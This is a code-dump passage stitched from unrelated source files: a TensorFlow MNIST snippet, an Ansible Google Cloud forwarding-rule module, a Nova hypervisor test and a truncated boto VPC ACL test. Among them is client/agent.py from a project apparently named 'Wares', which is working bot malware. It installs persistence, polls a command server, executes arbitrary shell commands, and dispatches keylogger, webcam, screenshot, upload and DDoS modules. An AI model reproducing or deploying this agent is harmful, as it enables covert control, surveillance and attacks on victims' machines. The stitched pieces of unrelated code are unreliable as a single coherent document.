print("step %d, training accuracy %g"%(i, train_accuracy))
_, loss_val = sess.run([train_step,cross_entropy], feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})
iterations.append(loss_val)
plt.plot(iterations)
plt.show()
#Number of correct predictions
correct_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print(accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))
| gpl-3.0 |
EzLucky/Wares | client/agent.py | 1 | 3066 | import time
import os
import requests
import sys
import platform
import socket
import random
import string
import settings
import utils
from modules import runcmd
from modules import persistence
from modules import download
from modules import upload
from modules import screenshot
from modules import ddos
from modules import keylogger
from modules import webcam
MODULES = ['runcmd', 'persistence', 'download', 'upload', 'screenshot', 'ddos', 'keylogger', 'webcam']
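# Each entry in MODULES must match a module file under modules/, since commands
# are dispatched via sys.modules["modules.<name>"].run() in the main loop below.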
if not settings.BOT_ID:
settings.BOT_ID = "AGENT-"+socket.gethostname()
if not utils.validate_botid(settings.BOT_ID):
settings.BOT_ID = "AGENT-"+''.join(random.choice(string.ascii_letters) for _ in range(5))
def print_help(mod=None):
help_text = "Loaded modules:\n"
if mod is None:
for module in MODULES:
help_text += "- " + module + "\n"
help_text += sys.modules["modules." + module].help()
help_text += """
General commands:
- cd path/to/dir : changes directory
- help : display this text
- [any other command] : execute shell command
"""
else:
help_text = "- " + mod + "\n"
help_text += sys.modules["modules.%s" % mod].help()
utils.send_output(help_text)
if __name__ == "__main__":
time.sleep(settings.PAUSE_AT_START)
if settings.AUTO_PERSIST:
persistence.install()
last_active = time.time()
is_idle = False
is_IDLE = False
while 1:
if is_IDLE:
# sleep 2min (REQUEST_INTERVAL = 5)
time.sleep(settings.REQUEST_INTERVAL * 24)
elif is_idle:
# sleep 30s (REQUEST_INTERVAL = 5)
time.sleep(settings.REQUEST_INTERVAL * 6)
else:
# sleep 5s (REQUEST_INTERVAL = 5)
time.sleep(settings.REQUEST_INTERVAL)
try:
command = requests.get(settings.SERVER_URL + "/api/pop?botid=" + settings.BOT_ID + "&sysinfo=" + platform.system() + " " + platform.release()).text
cmdargs = command.split(" ")
if command:
if settings.DEBUG:
print command
if cmdargs[0] == "cd":
os.chdir(os.path.expandvars(" ".join(cmdargs[1:])))
elif cmdargs[0] in MODULES:
sys.modules["modules.%s" % cmdargs[0]].run(*cmdargs[1:])
elif cmdargs[0] == "help":
if len(cmdargs) > 1:
print_help(cmdargs[1])
else:
print_help()
else:
runcmd.run(command)
last_active = time.time()
is_idle = False
is_IDLE = False
elif time.time() - last_active > (settings.IDLE_TIME*5):
# if 10min of inactivity go IDLE
is_IDLE = True
elif time.time() - last_active > settings.IDLE_TIME:
# if 2min of inactivity go idle
is_idle = True
except Exception, exc:
is_idle = True
utils.send_output(exc)
if settings.DEBUG:
print exc
| mit |
gaddman/ansible | lib/ansible/modules/cloud/google/gcp_compute_forwarding_rule.py | 7 | 25717 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ["preview"],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_forwarding_rule
description:
- A ForwardingRule resource. A ForwardingRule resource specifies which pool of target
virtual machines to forward a packet to if it matches the given [IPAddress, IPProtocol,
portRange] tuple.
short_description: Creates a GCP ForwardingRule
version_added: 2.6
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
state:
description:
- Whether the given object should exist in GCP
choices:
- present
- absent
default: present
description:
description:
- An optional description of this resource. Provide this property when you create
the resource.
required: false
ip_address:
description:
- The IP address that this forwarding rule is serving on behalf of.
- Addresses are restricted based on the forwarding rule's load balancing scheme
(EXTERNAL or INTERNAL) and scope (global or regional).
- When the load balancing scheme is EXTERNAL, for global forwarding rules, the
address must be a global IP, and for regional forwarding rules, the address
must live in the same region as the forwarding rule. If this field is empty,
an ephemeral IPv4 address from the same scope (global or regional) will be assigned.
A regional forwarding rule supports IPv4 only. A global forwarding rule supports
either IPv4 or IPv6.
- When the load balancing scheme is INTERNAL, this can only be an RFC 1918 IP
address belonging to the network/subnet configured for the forwarding rule.
By default, if this field is empty, an ephemeral internal IP address will be
automatically allocated from the IP range of the subnet or network configured
for this forwarding rule.
- 'An address can be specified either by a literal IP address or a URL reference
to an existing Address resource. The following examples are all valid: * 100.1.2.3
* U(https://www.googleapis.com/compute/v1/projects/project/regions/region/addresses/address)
* projects/project/regions/region/addresses/address * regions/region/addresses/address
* global/addresses/address * address .'
required: false
ip_protocol:
description:
- The IP protocol to which this rule applies. Valid options are TCP, UDP, ESP,
AH, SCTP or ICMP.
- When the load balancing scheme is INTERNAL, only TCP and UDP are valid.
required: false
choices:
- TCP
- UDP
- ESP
- AH
- SCTP
- ICMP
backend_service:
description:
- A reference to a BackendService to receive the matched traffic.
- This is used for internal load balancing.
- "(not used for external load balancing) ."
- 'This field represents a link to a BackendService resource in GCP. It can be
specified in two ways. You can add `register: name-of-resource` to a gcp_compute_backend_service
task and then set this backend_service field to "{{ name-of-resource }}" Alternatively,
you can set this backend_service to a dictionary with the selfLink key where
the value is the selfLink of your BackendService'
required: false
ip_version:
description:
- The IP Version that will be used by this forwarding rule. Valid options are
IPV4 or IPV6. This can only be specified for a global forwarding rule.
required: false
choices:
- IPV4
- IPV6
load_balancing_scheme:
description:
- 'This signifies what the ForwardingRule will be used for and can only take the
following values: INTERNAL, EXTERNAL The value of INTERNAL means that this will
be used for Internal Network Load Balancing (TCP, UDP). The value of EXTERNAL
means that this will be used for External Load Balancing (HTTP(S) LB, External
TCP/UDP LB, SSL Proxy) .'
required: false
choices:
- INTERNAL
- EXTERNAL
name:
description:
- Name of the resource; provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
required: true
network:
description:
- For internal load balancing, this field identifies the network that the load
balanced IP should belong to for this Forwarding Rule. If this field is not
specified, the default network will be used.
- This field is not used for external load balancing.
- 'This field represents a link to a Network resource in GCP. It can be specified
in two ways. You can add `register: name-of-resource` to a gcp_compute_network
task and then set this network field to "{{ name-of-resource }}" Alternatively,
you can set this network to a dictionary with the selfLink key where the value
is the selfLink of your Network'
required: false
port_range:
description:
- This field is used along with the target field for TargetHttpProxy, TargetHttpsProxy,
TargetSslProxy, TargetTcpProxy, TargetVpnGateway, TargetPool, TargetInstance.
- Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets addressed
to ports in the specified range will be forwarded to target.
- Forwarding rules with the same [IPAddress, IPProtocol] pair must have disjoint
port ranges.
- 'Some types of forwarding target have constraints on the acceptable ports: *
TargetHttpProxy: 80, 8080 * TargetHttpsProxy: 443 * TargetTcpProxy: 25, 43,
110, 143, 195, 443, 465, 587, 700, 993, 995, 1883, 5222 * TargetSslProxy: 25,
43, 110, 143, 195, 443, 465, 587, 700, 993, 995, 1883, 5222 * TargetVpnGateway:
500, 4500 .'
required: false
ports:
description:
- This field is used along with the backend_service field for internal load balancing.
- When the load balancing scheme is INTERNAL, a single port or a comma separated
list of ports can be configured. Only packets addressed to these ports will
be forwarded to the backends configured with this forwarding rule.
- You may specify a maximum of up to 5 ports.
required: false
subnetwork:
description:
- A reference to a subnetwork.
- For internal load balancing, this field identifies the subnetwork that the load
balanced IP should belong to for this Forwarding Rule.
- If the network specified is in auto subnet mode, this field is optional. However,
if the network is in custom subnet mode, a subnetwork must be specified.
- This field is not used for external load balancing.
- 'This field represents a link to a Subnetwork resource in GCP. It can be specified
in two ways. You can add `register: name-of-resource` to a gcp_compute_subnetwork
task and then set this subnetwork field to "{{ name-of-resource }}" Alternatively,
you can set this subnetwork to a dictionary with the selfLink key where the
value is the selfLink of your Subnetwork'
required: false
target:
description:
- A reference to a TargetPool resource to receive the matched traffic.
- For regional forwarding rules, this target must live in the same region as the
forwarding rule. For global forwarding rules, this target must be a global load
balancing resource. The forwarded traffic must be of a type appropriate to the
target object.
- This field is not used for internal load balancing.
- 'This field represents a link to a TargetPool resource in GCP. It can be specified
in two ways. You can add `register: name-of-resource` to a gcp_compute_target_pool
task and then set this target field to "{{ name-of-resource }}" Alternatively,
you can set this target to a dictionary with the selfLink key where the value
is the selfLink of your TargetPool'
required: false
version_added: 2.7
network_tier:
description:
- 'The networking tier used for configuring this address. This field can take
the following values: PREMIUM or STANDARD. If this field is not specified, it
is assumed to be PREMIUM.'
required: false
version_added: 2.8
choices:
- PREMIUM
- STANDARD
region:
description:
- A reference to the region where the regional forwarding rule resides.
- This field is not applicable to global forwarding rules.
required: true
extends_documentation_fragment: gcp
notes:
- 'API Reference: U(https://cloud.google.com/compute/docs/reference/latest/forwardingRule)'
- 'Official Documentation: U(https://cloud.google.com/compute/docs/load-balancing/network/forwarding-rules)'
'''
EXAMPLES = '''
- name: create a address
gcp_compute_address:
name: "address-forwardingrule"
region: us-west1
project: "{{ gcp_project }}"
auth_kind: "{{ gcp_cred_kind }}"
service_account_file: "{{ gcp_cred_file }}"
state: present
register: address
- name: create a target pool
gcp_compute_target_pool:
name: "targetpool-forwardingrule"
region: us-west1
project: "{{ gcp_project }}"
auth_kind: "{{ gcp_cred_kind }}"
service_account_file: "{{ gcp_cred_file }}"
state: present
register: targetpool
- name: create a forwarding rule
gcp_compute_forwarding_rule:
name: "test_object"
region: us-west1
target: "{{ targetpool }}"
ip_protocol: TCP
port_range: 80-80
ip_address: "{{ address.address }}"
project: "test_project"
auth_kind: "serviceaccount"
service_account_file: "/tmp/auth.pem"
state: present
'''
RETURN = '''
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
description:
description:
- An optional description of this resource. Provide this property when you create
the resource.
returned: success
type: str
id:
description:
- The unique identifier for the resource.
returned: success
type: int
IPAddress:
description:
- The IP address that this forwarding rule is serving on behalf of.
- Addresses are restricted based on the forwarding rule's load balancing scheme
(EXTERNAL or INTERNAL) and scope (global or regional).
- When the load balancing scheme is EXTERNAL, for global forwarding rules, the address
must be a global IP, and for regional forwarding rules, the address must live
in the same region as the forwarding rule. If this field is empty, an ephemeral
IPv4 address from the same scope (global or regional) will be assigned. A regional
forwarding rule supports IPv4 only. A global forwarding rule supports either IPv4
or IPv6.
- When the load balancing scheme is INTERNAL, this can only be an RFC 1918 IP address
belonging to the network/subnet configured for the forwarding rule. By default,
if this field is empty, an ephemeral internal IP address will be automatically
allocated from the IP range of the subnet or network configured for this forwarding
rule.
- 'An address can be specified either by a literal IP address or a URL reference
to an existing Address resource. The following examples are all valid: * 100.1.2.3
* U(https://www.googleapis.com/compute/v1/projects/project/regions/region/addresses/address)
* projects/project/regions/region/addresses/address * regions/region/addresses/address
* global/addresses/address * address .'
returned: success
type: str
IPProtocol:
description:
- The IP protocol to which this rule applies. Valid options are TCP, UDP, ESP, AH,
SCTP or ICMP.
- When the load balancing scheme is INTERNAL, only TCP and UDP are valid.
returned: success
type: str
backendService:
description:
- A reference to a BackendService to receive the matched traffic.
- This is used for internal load balancing.
- "(not used for external load balancing) ."
returned: success
type: dict
ipVersion:
description:
- The IP Version that will be used by this forwarding rule. Valid options are IPV4
or IPV6. This can only be specified for a global forwarding rule.
returned: success
type: str
loadBalancingScheme:
description:
- 'This signifies what the ForwardingRule will be used for and can only take the
following values: INTERNAL, EXTERNAL The value of INTERNAL means that this will
be used for Internal Network Load Balancing (TCP, UDP). The value of EXTERNAL
means that this will be used for External Load Balancing (HTTP(S) LB, External
TCP/UDP LB, SSL Proxy) .'
returned: success
type: str
name:
description:
- Name of the resource; provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
network:
description:
- For internal load balancing, this field identifies the network that the load balanced
IP should belong to for this Forwarding Rule. If this field is not specified,
the default network will be used.
- This field is not used for external load balancing.
returned: success
type: dict
portRange:
description:
- This field is used along with the target field for TargetHttpProxy, TargetHttpsProxy,
TargetSslProxy, TargetTcpProxy, TargetVpnGateway, TargetPool, TargetInstance.
- Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets addressed to
ports in the specified range will be forwarded to target.
- Forwarding rules with the same [IPAddress, IPProtocol] pair must have disjoint
port ranges.
- 'Some types of forwarding target have constraints on the acceptable ports: * TargetHttpProxy:
80, 8080 * TargetHttpsProxy: 443 * TargetTcpProxy: 25, 43, 110, 143, 195, 443,
465, 587, 700, 993, 995, 1883, 5222 * TargetSslProxy: 25, 43, 110, 143, 195, 443,
465, 587, 700, 993, 995, 1883, 5222 * TargetVpnGateway: 500, 4500 .'
returned: success
type: str
ports:
description:
- This field is used along with the backend_service field for internal load balancing.
- When the load balancing scheme is INTERNAL, a single port or a comma separated
list of ports can be configured. Only packets addressed to these ports will be
forwarded to the backends configured with this forwarding rule.
- You may specify a maximum of up to 5 ports.
returned: success
type: list
subnetwork:
description:
- A reference to a subnetwork.
- For internal load balancing, this field identifies the subnetwork that the load
balanced IP should belong to for this Forwarding Rule.
- If the network specified is in auto subnet mode, this field is optional. However,
if the network is in custom subnet mode, a subnetwork must be specified.
- This field is not used for external load balancing.
returned: success
type: dict
target:
description:
- A reference to a TargetPool resource to receive the matched traffic.
- For regional forwarding rules, this target must live in the same region as the
forwarding rule. For global forwarding rules, this target must be a global load
balancing resource. The forwarded traffic must be of a type appropriate to the
target object.
- This field is not used for internal load balancing.
returned: success
type: dict
networkTier:
description:
- 'The networking tier used for configuring this address. This field can take the
following values: PREMIUM or STANDARD. If this field is not specified, it is assumed
to be PREMIUM.'
returned: success
type: str
region:
description:
- A reference to the region where the regional forwarding rule resides.
- This field is not applicable to global forwarding rules.
returned: success
type: str
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, replace_resource_dict
import json
import time
################################################################################
# Main
################################################################################
def main():
"""Main function"""
module = GcpModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
description=dict(type='str'),
ip_address=dict(type='str'),
ip_protocol=dict(type='str', choices=['TCP', 'UDP', 'ESP', 'AH', 'SCTP', 'ICMP']),
backend_service=dict(type='dict'),
ip_version=dict(type='str', choices=['IPV4', 'IPV6']),
load_balancing_scheme=dict(type='str', choices=['INTERNAL', 'EXTERNAL']),
name=dict(required=True, type='str'),
network=dict(type='dict'),
port_range=dict(type='str'),
ports=dict(type='list', elements='str'),
subnetwork=dict(type='dict'),
target=dict(type='dict'),
network_tier=dict(type='str', choices=['PREMIUM', 'STANDARD']),
region=dict(required=True, type='str')
)
)
if not module.params['scopes']:
module.params['scopes'] = ['https://www.googleapis.com/auth/compute']
state = module.params['state']
kind = 'compute#forwardingRule'
fetch = fetch_resource(module, self_link(module), kind)
changed = False
if fetch:
if state == 'present':
if is_different(module, fetch):
update(module, self_link(module), kind, fetch)
fetch = fetch_resource(module, self_link(module), kind)
changed = True
else:
delete(module, self_link(module), kind)
fetch = {}
changed = True
else:
if state == 'present':
fetch = create(module, collection(module), kind)
changed = True
else:
fetch = {}
fetch.update({'changed': changed})
module.exit_json(**fetch)
def create(module, link, kind):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.post(link, resource_to_request(module)))
def update(module, link, kind, fetch):
update_fields(module, resource_to_request(module),
response_to_hash(module, fetch))
return fetch_resource(module, self_link(module), kind)
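# Only the target field is updated in place: update_fields() re-issues a
# setTarget call when the requested target differs from the current one; other
# field changes are not applied by update().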
def update_fields(module, request, response):
if response.get('target') != request.get('target'):
target_update(module, request, response)
def target_update(module, request, response):
auth = GcpSession(module, 'compute')
auth.post(
''.join([
"https://www.googleapis.com/compute/v1/",
"projects/{project}/regions/{region}/forwardingRules/{name}/setTarget"
]).format(**module.params),
{
u'target': replace_resource_dict(module.params.get(u'target', {}), 'selfLink')
}
)
def delete(module, link, kind):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.delete(link))
def resource_to_request(module):
request = {
u'kind': 'compute#forwardingRule',
u'description': module.params.get('description'),
u'IPAddress': module.params.get('ip_address'),
u'IPProtocol': module.params.get('ip_protocol'),
u'backendService': replace_resource_dict(module.params.get(u'backend_service', {}), 'selfLink'),
u'ipVersion': module.params.get('ip_version'),
u'loadBalancingScheme': module.params.get('load_balancing_scheme'),
u'name': module.params.get('name'),
u'network': replace_resource_dict(module.params.get(u'network', {}), 'selfLink'),
u'portRange': module.params.get('port_range'),
u'ports': module.params.get('ports'),
u'subnetwork': replace_resource_dict(module.params.get(u'subnetwork', {}), 'selfLink'),
u'target': replace_resource_dict(module.params.get(u'target', {}), 'selfLink'),
u'networkTier': module.params.get('network_tier')
}
return_vals = {}
for k, v in request.items():
if v:
return_vals[k] = v
return return_vals
def fetch_resource(module, link, kind, allow_not_found=True):
auth = GcpSession(module, 'compute')
return return_if_object(module, auth.get(link), kind, allow_not_found)
def self_link(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/regions/{region}/forwardingRules/{name}".format(**module.params)
def collection(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/regions/{region}/forwardingRules".format(**module.params)
def return_if_object(module, response, kind, allow_not_found=False):
# If not found, return nothing.
if allow_not_found and response.status_code == 404:
return None
# If no content, return nothing.
if response.status_code == 204:
return None
try:
module.raise_for_status(response)
result = response.json()
except getattr(json.decoder, 'JSONDecodeError', ValueError) as inst:
module.fail_json(msg="Invalid JSON response with error: %s" % inst)
if navigate_hash(result, ['error', 'errors']):
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
return result
def is_different(module, response):
request = resource_to_request(module)
response = response_to_hash(module, response)
# Remove all output-only from response.
response_vals = {}
for k, v in response.items():
if k in request:
response_vals[k] = v
request_vals = {}
for k, v in request.items():
if k in response:
request_vals[k] = v
return GcpRequest(request_vals) != GcpRequest(response_vals)
# Remove unnecessary properties from the response.
# This is for doing comparisons with Ansible's current parameters.
def response_to_hash(module, response):
return {
u'creationTimestamp': response.get(u'creationTimestamp'),
u'description': response.get(u'description'),
u'id': response.get(u'id'),
u'IPAddress': response.get(u'IPAddress'),
u'IPProtocol': response.get(u'IPProtocol'),
u'backendService': response.get(u'backendService'),
u'ipVersion': response.get(u'ipVersion'),
u'loadBalancingScheme': response.get(u'loadBalancingScheme'),
u'name': response.get(u'name'),
u'network': response.get(u'network'),
u'portRange': response.get(u'portRange'),
u'ports': response.get(u'ports'),
u'subnetwork': response.get(u'subnetwork'),
u'target': response.get(u'target'),
u'networkTier': module.params.get('network_tier')
}
def async_op_url(module, extra_data=None):
if extra_data is None:
extra_data = {}
url = "https://www.googleapis.com/compute/v1/projects/{project}/regions/{region}/operations/{op_id}"
combined = extra_data.copy()
combined.update(module.params)
return url.format(**combined)
def wait_for_operation(module, response):
op_result = return_if_object(module, response, 'compute#operation')
if op_result is None:
return {}
status = navigate_hash(op_result, ['status'])
wait_done = wait_for_completion(status, op_result, module)
return fetch_resource(module, navigate_hash(wait_done, ['targetLink']), 'compute#forwardingRule')
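# Poll the regional Operations endpoint once per second until the operation
# reports DONE, failing the module if the operation carries errors.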
def wait_for_completion(status, op_result, module):
op_id = navigate_hash(op_result, ['name'])
op_uri = async_op_url(module, {'op_id': op_id})
while status != 'DONE':
raise_if_errors(op_result, ['error', 'errors'], module)
time.sleep(1.0)
op_result = fetch_resource(module, op_uri, 'compute#operation')
status = navigate_hash(op_result, ['status'])
return op_result
def raise_if_errors(response, err_path, module):
errors = navigate_hash(response, err_path)
if errors is not None:
module.fail_json(msg=errors)
if __name__ == '__main__':
main()
| gpl-3.0 |
double12gzh/nova | nova/tests/unit/api/openstack/compute/contrib/test_hypervisor_status.py | 36 | 3820 | # Copyright 2014 Intel Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
from nova.api.openstack.compute.contrib import hypervisors as hypervisors_v2
from nova.api.openstack.compute.plugins.v3 import hypervisors \
as hypervisors_v21
from nova.api.openstack import extensions
from nova import objects
from nova import test
from nova.tests.unit.api.openstack.compute.contrib import test_hypervisors
TEST_HYPER = test_hypervisors.TEST_HYPERS_OBJ[0].obj_clone()
TEST_SERVICE = objects.Service(id=1,
host="compute1",
binary="nova-compute",
topic="compute_topic",
report_count=5,
disabled=False,
disabled_reason=None,
availability_zone="nova")
class HypervisorStatusTestV21(test.NoDBTestCase):
def _prepare_extension(self):
self.controller = hypervisors_v21.HypervisorsController()
self.controller.servicegroup_api.service_is_up = mock.MagicMock(
return_value=True)
def test_view_hypervisor_service_status(self):
self._prepare_extension()
result = self.controller._view_hypervisor(
TEST_HYPER, TEST_SERVICE, False)
self.assertEqual('enabled', result['status'])
self.assertEqual('up', result['state'])
self.assertEqual('enabled', result['status'])
self.controller.servicegroup_api.service_is_up.return_value = False
result = self.controller._view_hypervisor(
TEST_HYPER, TEST_SERVICE, False)
self.assertEqual('down', result['state'])
hyper = copy.deepcopy(TEST_HYPER)
service = copy.deepcopy(TEST_SERVICE)
service.disabled = True
result = self.controller._view_hypervisor(hyper, service, False)
self.assertEqual('disabled', result['status'])
def test_view_hypervisor_detail_status(self):
self._prepare_extension()
result = self.controller._view_hypervisor(
TEST_HYPER, TEST_SERVICE, True)
self.assertEqual('enabled', result['status'])
self.assertEqual('up', result['state'])
self.assertIsNone(result['service']['disabled_reason'])
self.controller.servicegroup_api.service_is_up.return_value = False
result = self.controller._view_hypervisor(
TEST_HYPER, TEST_SERVICE, True)
self.assertEqual('down', result['state'])
hyper = copy.deepcopy(TEST_HYPER)
service = copy.deepcopy(TEST_SERVICE)
service.disabled = True
service.disabled_reason = "fake"
result = self.controller._view_hypervisor(hyper, service, True)
self.assertEqual('disabled', result['status'])
self.assertEqual('fake', result['service']['disabled_reason'])
class HypervisorStatusTestV2(HypervisorStatusTestV21):
def _prepare_extension(self):
ext_mgr = extensions.ExtensionManager()
ext_mgr.extensions = {}
ext_mgr.extensions['os-hypervisor-status'] = True
self.controller = hypervisors_v2.HypervisorsController(ext_mgr)
self.controller.servicegroup_api.service_is_up = mock.MagicMock(
return_value=True)
| apache-2.0 |
awatts/boto | tests/unit/vpc/test_networkacl.py | 113 | 20957 | from tests.unit import unittest
from tests.unit import AWSMockServiceTestCase
from boto.vpc import VPCConnection
class TestDescribeNetworkAcls(AWSMockServiceTestCase):
connection_class = VPCConnection
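# default_body is the canned DescribeNetworkAcls XML used by set_http_response
# as the mocked EC2 response for this test case.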
def default_body(self):
return b"""
<DescribeNetworkAclsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<networkAclSet>
<item>
<networkAclId>acl-5566953c</networkAclId>
<vpcId>vpc-5266953b</vpcId>
<default>true</default>
<entrySet>
<item>
<ruleNumber>100</ruleNumber>
<protocol>all</protocol>
<ruleAction>allow</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>100</ruleNumber>
<protocol>all</protocol>
<ruleAction>allow</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
</entrySet>
<associationSet/>
<tagSet/>
</item>
<item>
<networkAclId>acl-5d659634</networkAclId>
<vpcId>vpc-5266953b</vpcId>
<default>false</default>
<entrySet>
<item>
<ruleNumber>110</ruleNumber>
<protocol>6</protocol>
<ruleAction>allow</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
<portRange>
<from>49152</from>
<to>65535</to>
</portRange>
</item>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>110</ruleNumber>
<protocol>6</protocol>
<ruleAction>allow</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
<portRange>
<from>80</from>
<to>80</to>
</portRange>
</item>
<item>
<ruleNumber>120</ruleNumber>
<protocol>6</protocol>
<ruleAction>allow</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
<portRange>
<from>443</from>
<to>443</to>
</portRange>
</item>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
</entrySet>
<associationSet>
<item>
<networkAclAssociationId>aclassoc-5c659635</networkAclAssociationId>
<networkAclId>acl-5d659634</networkAclId>
<subnetId>subnet-ff669596</subnetId>
</item>
<item>
<networkAclAssociationId>aclassoc-c26596ab</networkAclAssociationId>
<networkAclId>acl-5d659634</networkAclId>
<subnetId>subnet-f0669599</subnetId>
</item>
</associationSet>
<tagSet/>
</item>
</networkAclSet>
</DescribeNetworkAclsResponse>
"""
def test_get_all_network_acls(self):
self.set_http_response(status_code=200)
response = self.service_connection.get_all_network_acls(['acl-5566953c', 'acl-5d659634'],
[('vpc-id', 'vpc-5266953b')])
self.assert_request_parameters({
'Action': 'DescribeNetworkAcls',
'NetworkAclId.1': 'acl-5566953c',
'NetworkAclId.2': 'acl-5d659634',
'Filter.1.Name': 'vpc-id',
'Filter.1.Value.1': 'vpc-5266953b'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(len(response), 2)
class TestReplaceNetworkAclAssociation(AWSMockServiceTestCase):
connection_class = VPCConnection
get_all_network_acls_vpc_body = b"""
<DescribeNetworkAclsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<networkAclSet>
<item>
<networkAclId>acl-5566953c</networkAclId>
<vpcId>vpc-5266953b</vpcId>
<default>true</default>
<entrySet>
<item>
<ruleNumber>100</ruleNumber>
<protocol>all</protocol>
<ruleAction>allow</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>100</ruleNumber>
<protocol>all</protocol>
<ruleAction>allow</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
</entrySet>
<associationSet/>
<tagSet/>
</item>
</networkAclSet>
</DescribeNetworkAclsResponse>
"""
get_all_network_acls_subnet_body = b"""
<DescribeNetworkAclsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<networkAclSet>
<item>
<networkAclId>acl-5d659634</networkAclId>
<vpcId>vpc-5266953b</vpcId>
<default>false</default>
<entrySet>
<item>
<ruleNumber>110</ruleNumber>
<protocol>6</protocol>
<ruleAction>allow</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
<portRange>
<from>49152</from>
<to>65535</to>
</portRange>
</item>
</entrySet>
<associationSet>
<item>
<networkAclAssociationId>aclassoc-c26596ab</networkAclAssociationId>
<networkAclId>acl-5d659634</networkAclId>
<subnetId>subnet-f0669599</subnetId>
</item>
<item>
<networkAclAssociationId>aclassoc-5c659635</networkAclAssociationId>
<networkAclId>acl-5d659634</networkAclId>
<subnetId>subnet-ff669596</subnetId>
</item>
</associationSet>
<tagSet/>
</item>
</networkAclSet>
</DescribeNetworkAclsResponse>
"""
def default_body(self):
return b"""
<ReplaceNetworkAclAssociationResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<newAssociationId>aclassoc-17b85d7e</newAssociationId>
</ReplaceNetworkAclAssociationResponse>
"""
def test_associate_network_acl(self):
self.https_connection.getresponse.side_effect = [
self.create_response(status_code=200, body=self.get_all_network_acls_subnet_body),
self.create_response(status_code=200)
]
